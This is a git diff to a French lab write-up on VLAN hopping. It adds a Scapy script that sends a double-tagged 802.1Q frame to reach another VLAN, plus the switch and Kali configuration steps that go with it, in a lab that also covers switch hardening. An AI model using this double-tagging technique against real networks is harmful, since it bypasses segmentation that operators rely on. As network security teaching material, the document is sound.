diff --git a/content/03_vlan_hopping.md b/content/03_vlan_hopping.md
index 2c8ed0ace3e3d7243a6c55650f86318aa87cf9d2..cf3f3dca6116c14e204771d9e97ab5dee9daa88b 100644
--- a/content/03_vlan_hopping.md
+++ b/content/03_vlan_hopping.md
@@ -319,11 +319,42 @@ fois-ci avec succès.
     S1(config-if)#exit
     ```
 
-![H1 est atteignable depuis `kali-linux-1`](../figs/h1_from_kali_reachable.png){width=80%}
+![H1 est atteignable depuis `kali-linux-1`](../figs/h1_from_kali_reachable.png)
 
 
 ### Double tagging `Scapy`
 
+Ci-dessous se trouve le script grâce auquel nous pourrons effectuer une par
+_double-tagging_.
+
+```python
+from scapy.all import *
+
+sendp(Ether(dst='ff:ff:ff:ff:ff:ff', src='00:01:02:03:04:05')/ \
+Dot1Q(vlan=1)/Dot1Q(vlan=100)/ \
+IP(dst='10.0.0.1', src='10.0.0.3')/ICMP(),iface="eth0")
+```
+
+Premièrement il faut enlever l'interface `GigabitEthernet 0/3` de S1 du VLAN 100 :
+
+```
+=============== Gi0/3 ================
+S1(config)#interface GigabitEthernet 0/3
+S1(config-if)#no switchport access vlan 100
+S1(config-if)#no shut
+S1(config-if)#exit
+```
+
+Puis il est nécessaire de retirer l'adresse IP attribué à `kali-linux-1` sur
+l'interface `eth0` :
+
+```bash
+sudo ip addr del 10.0.0.3/24 dev eth0
+```
+
+
+
+
 ### Double tagging `iproute2`
 
 ### Sécurisation des switches